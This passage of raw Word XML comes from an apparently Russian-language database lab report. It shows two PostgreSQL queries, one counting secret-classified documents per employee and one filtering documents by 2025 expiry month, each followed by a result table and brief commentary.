      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Листинг </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Листинг \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Запрос 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="3BD91729" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27FD07AD" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>SELECT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311C37C3" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.responsible_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> AS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>responsible_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22940B5C" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>COUNT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">*) AS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>secret_documents_count</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="248481E5" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>FROM documents d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A77EDE2" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>d.secrecy</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_level</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>секретно</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35EDB9B7" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GROUP BY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>d.responsible</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7BFA674F" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HAVING </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>COUNT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>*) &gt; 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228AA498" w14:textId="505A4CFE" w:rsidR="00C2601B" w:rsidRPr="00B02A76" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ORDER BY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>d.responsible</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C346FF4" w14:textId="33487987" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00903505">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C24BD94" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:lastRenderedPageBreak/>
        <w:t>Таблица 5 – Результат запроса 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4765"/>
        <w:gridCol w:w="5147"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="09861C3D" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4765" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0889B9C0" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>responsible_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26A7AC34" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>secret_documents_count</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="479C2B29" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78F5FF5D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Сотрудник_А</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5147" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10527D43" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D30AA19" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B"/>
    <w:p w14:paraId="5EFA51A1" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате выполнения запроса был найден сотрудник </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Сотрудник_А</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, отвечающий за 2 секретных документа. Это подтверждает, что запрос корректно учитывает заданную степень секретности и не смешивает секретные документы с документами других категорий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A7171" w14:textId="49014F9F" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Второй запрос выбирает документы, срок окончания действия которых не входит в заданный перечень месяцев. В качестве параметров были выбраны год 2025 и месяцы май, июнь и июль.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F754AD" w14:textId="22AA0835" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Листинг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:t xml:space="preserve">Запрос </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="074BA3E2" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67253F38" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>SELECT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AF736D7" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18FF9460" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.responsible_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEBD82E" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.effective_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D1241E" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>EXTRACT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">MONTH FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.effective_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">)::int AS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>effective_until_month</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="336370B6" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>FROM documents d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E7B97B" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>d.effective</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> IS NOT NULL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CC36279" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  AND </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>EXTRACT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">YEAR FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.effective_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)::int = 2025</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA59E0A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  AND NOT (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>EXTRACT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">MONTH FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.effective_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)::int = ANY(ARRAY[5,6,7]::int[]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A389227" w14:textId="22ACB68F" w:rsidR="00C2601B" w:rsidRPr="00B02A76" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ORDER BY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>d.effective</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E5EFEE4" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E52B9E" w14:textId="56E44604" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Таблица 6 – Результат запроса 2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3556"/>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="2262"/>
        <w:gridCol w:w="1264"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="7B05CEF5" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CC70917" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AB49625" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>responsible_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CF0B44D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>effective_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4941C3EA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>month</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="57BDD3CE" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28E17CE0" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>DOC-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D805831" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Сотрудник_Б</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FC44031" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>2025-03-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56DF8352" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="2DB5C8B2" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="287358B5" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>DOC-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C1EED8B" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Сотрудник_Д</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="798BECDF" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>2025-08-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="080B1F20" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="13FEBED8" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31E125BD" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>DOC-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25718BAB" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Сотрудник_Г</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1007E7F4" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>2025-10-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A5A4466" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
